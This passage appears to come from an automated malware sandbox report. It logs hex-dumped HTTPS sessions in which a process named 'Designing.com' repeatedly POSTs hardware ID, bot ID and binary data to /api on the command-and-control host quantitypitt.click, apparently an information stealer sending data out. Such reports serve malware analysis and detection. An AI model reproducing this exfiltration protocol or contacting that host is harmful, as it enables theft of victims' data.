                                                                                                                                                                            Data Ascii: kRdpoAUfTSTbdkLtrhJyedzC5+nFhWuikdpd1fA2zX6jGX/qG1hZaNF9BbrrUTs62tCuvYqjYruXhhWU7nPZMqQYMrhaUV5h1ncBuu0DdHzPyOPv2IhktZbQQtf3O8t+sR1y4xERGiTbYkLtrjJibNfP4vPBg2ymls0PmrEsx2PjTGTwDVZLKsU6BbmuSTV81M7p48SQaraU0kbd9TXDcqcQdeUZXV9j33UGvOAYejqTiOn9itovkYDeQ9mxIo5
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 4b 41 64 53 52 51 38 6e 46 6f 4a 6f 2b 73 57 59 7a 6a 6f 79 2b 44 72 7a 5a 51 76 72 36 53 54 44 39 57 78 5a 66 6c 72 34 77 49 79 75 45 67 66 46 48 61 63 49 6b 4c 79 37 51 4e 6e 66 4e 37 65 37 61 4c 30 76 45 69 6d 6b 64 70 66 30 2b 59 79 67 44 7a 6a 47 7a 4b 34 49 78 46 64 59 38 64 72 46 4c 6a 2b 46 6a 56 46 6b 34 6a 32 70 5a 4c 43 57 72 4f 56 30 30 6a 43 34 48 44 6e 5a 4b 6b 54 59 75 63 4e 58 68 51 71 6e 48 78 43 37 62 31 66 4e 58 37 4d 69 4c 61 31 6d 4e 6b 36 34 38 79 4e 48 63 75 2f 4a 49 42 6b 34 30 77 67 72 6c 70 44 46 44 79 63 50 51 47 6e 2f 42 64 32 62 4e 36 50 30 4e 76 74 6d 47 4b 32 6a 4d 78 78 36 76 59 6e 7a 58 53 30 42 54 37 31 47 56 39 61 59 38 6f 36 54 50 58 68 55 53 31 44 6e 59 43 75 32 6f 54 43 64 2f 44 44 6e 58 72 58 2f 7a 50 48 5a 4c 4a 5a
                                                                                                                                                                            Data Ascii: KAdSRQ8nFoJo+sWYzjoy+DrzZQvr6STD9WxZflr4wIyuEgfFHacIkLy7QNnfN7e7aL0vEimkdpf0+YygDzjGzK4IxFdY8drFLj+FjVFk4j2pZLCWrOV00jC4HDnZKkTYucNXhQqnHxC7b1fNX7MiLa1mNk648yNHcu/JIBk40wgrlpDFDycPQGn/Bd2bN6P0NvtmGK2jMxx6vYnzXS0BT71GV9aY8o6TPXhUS1DnYCu2oTCd/DDnXrX/zPHZLJZ
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 4d 61 4a 4d 34 36 57 76 57 70 45 6d 64 6f 32 38 76 34 35 6f 32 38 55 5a 65 56 32 6b 37 43 34 53 72 50 54 4a 30 42 63 65 34 55 56 6b 4a 31 6e 44 52 43 75 71 35 4a 54 44 71 56 69 4e 47 72 69 70 6f 76 36 4e 76 6f 54 4e 72 2f 4f 74 5a 6a 37 6a 4e 38 35 78 74 48 52 48 50 54 4f 6b 7a 31 36 46 45 74 4b 4a 4f 49 36 76 53 4b 32 6a 2f 69 77 49 67 63 67 36 46 76 33 7a 79 36 56 47 53 67 51 67 4d 61 4a 4d 34 36 57 76 57 70 45 6d 64 6f 32 38 76 34 35 6f 32 38 55 5a 65 56 32 6b 37 43 34 53 72 50 50 59 30 69 55 39 34 6b 52 46 64 71 30 6e 30 55 70 4b 35 66 4e 58 57 64 6b 4e 65 6c 67 73 4a 51 2f 74 76 46 44 34 79 78 43 4d 4e 38 72 52 4e 6b 38 56 64 32 57 6d 50 64 62 42 4b 69 34 56 35 62 54 50 79 49 6f 4b 58 4d 77 6a 66 69 31 5a 31 4c 78 62 46 6c 6b 43 44 34 51 53 47 33 53
                                                                                                                                                                            Data Ascii: MaJM46WvWpEmdo28v45o28UZeV2k7C4SrPTJ0Bce4UVkJ1nDRCuq5JTDqViNGripov6NvoTNr/OtZj7jN85xtHRHPTOkz16FEtKJOI6vSK2j/iwIgcg6Fv3zy6VGSgQgMaJM46WvWpEmdo28v45o28UZeV2k7C4SrPPY0iU94kRFdq0n0UpK5fNXWdkNelgsJQ/tvFD4yxCMN8rRNk8Vd2WmPdbBKi4V5bTPyIoKXMwjfi1Z1LxbFlkCD4QSG3S
                                                                                                                                                                            2024-12-22 22:28:47 UTC1369INData Raw: 53 4f 68 72 31 74 6c 46 59 61 4e 72 59 37 61 57 45 77 6d 50 77 77 35 31 43 78 76 59 74 77 7a 36 6b 44 6e 57 67 42 52 39 4e 4a 4d 6f 36 57 75 61 67 55 57 63 36 68 59 69 70 36 38 65 44 62 4c 36 59 7a 31 33 53 38 69 76 44 4e 5a 30 71 58 2f 49 64 51 56 63 6d 37 58 63 47 6f 2f 73 53 5a 58 33 6a 39 73 50 33 7a 5a 4a 73 38 72 66 61 51 74 6a 50 41 2f 64 6a 70 41 51 77 78 68 6c 48 56 79 53 53 4f 68 72 31 74 6c 46 59 61 4e 72 59 37 61 66 6d 68 57 4b 38 32 38 49 42 7a 62 45 72 67 43 72 77 57 6a 4c 79 57 67 6b 55 49 39 39 6f 45 4c 50 74 42 33 59 39 34 2f 62 44 39 38 32 53 62 50 4b 71 30 45 76 43 35 44 37 51 64 5a 30 71 58 2f 49 64 51 56 63 6d 2b 55 42 41 68 50 67 53 64 58 54 61 69 4b 43 6c 30 73 49 33 38 4c 62 50 53 4d 54 79 66 2b 56 49 34 53 56 6b 34 78 70 66 55 79
                                                                                                                                                                            Data Ascii: SOhr1tlFYaNrY7aWEwmPww51CxvYtwz6kDnWgBR9NJMo6WuagUWc6hYip68eDbL6Yz13S8ivDNZ0qX/IdQVcm7XcGo/sSZX3j9sP3zZJs8rfaQtjPA/djpAQwxhlHVySSOhr1tlFYaNrY7afmhWK828IBzbErgCrwWjLyWgkUI99oELPtB3Y94/bD982SbPKq0EvC5D7QdZ0qX/IdQVcm+UBAhPgSdXTaiKCl0sI38LbPSMTyf+VI4SVk4xpfUy


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.549775172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:49 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=84ORA7LFCGFL3S
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 12810
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:49 UTC12810OUTData Raw: 2d 2d 38 34 4f 52 41 37 4c 46 43 47 46 4c 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 38 34 4f 52 41 37 4c 46 43 47 46 4c 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 34 4f 52 41 37 4c 46 43 47 46 4c 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 38 34 4f 52 41 37 4c 46 43
                                                                                                                                                                            Data Ascii: --84ORA7LFCGFL3SContent-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--84ORA7LFCGFL3SContent-Disposition: form-data; name="pid"2--84ORA7LFCGFL3SContent-Disposition: form-data; name="lid"hRjzG3--VIKA--84ORA7LFC
                                                                                                                                                                            2024-12-22 22:28:50 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:50 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=ecp4ie2bhku20pscafvc86hsdr; expires=Thu, 17 Apr 2025 16:15:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHpXiS7iIexzIPEhcYFzhOKhUwV1qBPTwACaFD8GCnKke50v25tL3famUhDER5Gel5s3lw1lHAvgza8CYELCZ0BNmin6BS3T4W8LKU230rEDK7EMXIx5Xy7usPe%2BQ0%2FYQht1xTw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c11dca58c71-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1788&rtt_var=693&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13748&delivery_rate=1554018&cwnd=193&unsent_bytes=0&cid=7840e4b0176dd909&ts=1255&x=0"
                                                                                                                                                                            2024-12-22 22:28:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                            2024-12-22 22:28:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.549782172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:51 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LU8PHT2JI4GEGC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 15052
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:51 UTC15052OUTData Raw: 2d 2d 4c 55 38 50 48 54 32 4a 49 34 47 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 4c 55 38 50 48 54 32 4a 49 34 47 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 55 38 50 48 54 32 4a 49 34 47 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4c 55 38 50 48 54 32 4a 49
                                                                                                                                                                            Data Ascii: --LU8PHT2JI4GEGCContent-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--LU8PHT2JI4GEGCContent-Disposition: form-data; name="pid"2--LU8PHT2JI4GEGCContent-Disposition: form-data; name="lid"hRjzG3--VIKA--LU8PHT2JI
                                                                                                                                                                            2024-12-22 22:28:52 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:52 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=n1ufdrqqf203pf874ckv4anle2; expires=Thu, 17 Apr 2025 16:15:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuY%2FtSQ%2FZZQtUI5lwC9x4JOY00fGxwRucG8ocWEQlfuh1OijkeUiiWUR4wGQAq6YOhkmJjL9718PW4v4voc1dISdiwGYiD8K3bschZ1A9rYHGR9Z%2FpsonbOxmfMYUJcJtYDaz98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c219c4d8c7b-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1780&rtt_var=683&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15990&delivery_rate=1582655&cwnd=186&unsent_bytes=0&cid=b0000328b89a261f&ts=875&x=0"
                                                                                                                                                                            2024-12-22 22:28:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                            2024-12-22 22:28:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.549788172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:54 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=5KF09NDH3SOHE
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 20536
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:54 UTC15331OUTData Raw: 2d 2d 35 4b 46 30 39 4e 44 48 33 53 4f 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 35 4b 46 30 39 4e 44 48 33 53 4f 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 4b 46 30 39 4e 44 48 33 53 4f 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 35 4b 46 30 39 4e 44 48 33 53 4f 48
                                                                                                                                                                            Data Ascii: --5KF09NDH3SOHEContent-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--5KF09NDH3SOHEContent-Disposition: form-data; name="pid"3--5KF09NDH3SOHEContent-Disposition: form-data; name="lid"hRjzG3--VIKA--5KF09NDH3SOH
                                                                                                                                                                            2024-12-22 22:28:54 UTC5205OUTData Raw: 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: un 4F([:7s~X`nO`i
                                                                                                                                                                            2024-12-22 22:28:55 UTC1142INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:54 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=1ddqt3q44kgc8t8502dvemc17c; expires=Thu, 17 Apr 2025 16:15:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CH32J%2BfsuUc%2FLTQ8%2FOExqO1h68kP6F%2F8R1tktRJ5ZjPiG9ie%2FQB5y8U9UiEuHLZrn1dsXLJ5f%2BQuAyHsbtx7qGnEzDGgXiQsEtwEFU9C6%2FKfmYiCBFhkjPIBwKxQTwIYq%2FN3T6Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c2fbe9bc431-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2437&min_rtt=1704&rtt_var=1162&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21495&delivery_rate=1713615&cwnd=229&unsent_bytes=0&cid=fd5ec087149c5944&ts=949&x=0"
                                                                                                                                                                            2024-12-22 22:28:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                            2024-12-22 22:28:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.549794172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:56 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=I8UMLDHAE16NIWXO8
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 3805
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:56 UTC3805OUTData Raw: 2d 2d 49 38 55 4d 4c 44 48 41 45 31 36 4e 49 57 58 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 49 38 55 4d 4c 44 48 41 45 31 36 4e 49 57 58 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 38 55 4d 4c 44 48 41 45 31 36 4e 49 57 58 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d
                                                                                                                                                                            Data Ascii: --I8UMLDHAE16NIWXO8Content-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--I8UMLDHAE16NIWXO8Content-Disposition: form-data; name="pid"1--I8UMLDHAE16NIWXO8Content-Disposition: form-data; name="lid"hRjzG3--VIKA--
                                                                                                                                                                            2024-12-22 22:28:57 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:57 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=p92i531ec9jb8ovua9k45vd3dp; expires=Thu, 17 Apr 2025 16:15:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EW5hxqdtWZ3dnTP%2FFmtl2yGnJo0WYSBvrCSCCf3LhdUF12%2BD9L1al27Ngw9RGoQYLL98ndk69bMIIQ3SSKPJSxEIs2DP4LSy1vKYemJkBYOpUKNuGhIR5G3bnvsfrt7GQM4M%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c3f2ce88c83-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1836&rtt_var=689&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2845&recv_bytes=4723&delivery_rate=1588683&cwnd=189&unsent_bytes=0&cid=604aa912ad475257&ts=1043&x=0"
                                                                                                                                                                            2024-12-22 22:28:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                            2024-12-22 22:28:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.549799172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:58 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=FRIS9LZKT7T94LOZIN4
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 1253
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:58 UTC1253OUTData Raw: 2d 2d 46 52 49 53 39 4c 5a 4b 54 37 54 39 34 4c 4f 5a 49 4e 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 46 52 49 53 39 4c 5a 4b 54 37 54 39 34 4c 4f 5a 49 4e 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 52 49 53 39 4c 5a 4b 54 37 54 39 34 4c 4f 5a 49 4e 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49
                                                                                                                                                                            Data Ascii: --FRIS9LZKT7T94LOZIN4Content-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--FRIS9LZKT7T94LOZIN4Content-Disposition: form-data; name="pid"1--FRIS9LZKT7T94LOZIN4Content-Disposition: form-data; name="lid"hRjzG3--VI
                                                                                                                                                                            2024-12-22 22:28:59 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:28:59 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=mjf9efrqpsu3s9otor6p4o5f5a; expires=Thu, 17 Apr 2025 16:15:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2eij3dD71HTqDPL1PVaGiYhK0oR9B8NcrAUetnt4p2%2FUDrsdfaGRge1NWDjJPKvi48ofWFwcDAhGtv5mH6a37jDwu7cf05%2BeTG%2F7HHB4duRU7aMBoRiC18g1kEAG1C0q7vPpig%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c4d9f3941db-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2092&rtt_var=787&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2173&delivery_rate=1387173&cwnd=235&unsent_bytes=0&cid=9cdb20a53ccce9bc&ts=805&x=0"
                                                                                                                                                                            2024-12-22 22:28:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                            Data Ascii: fok 8.46.123.189
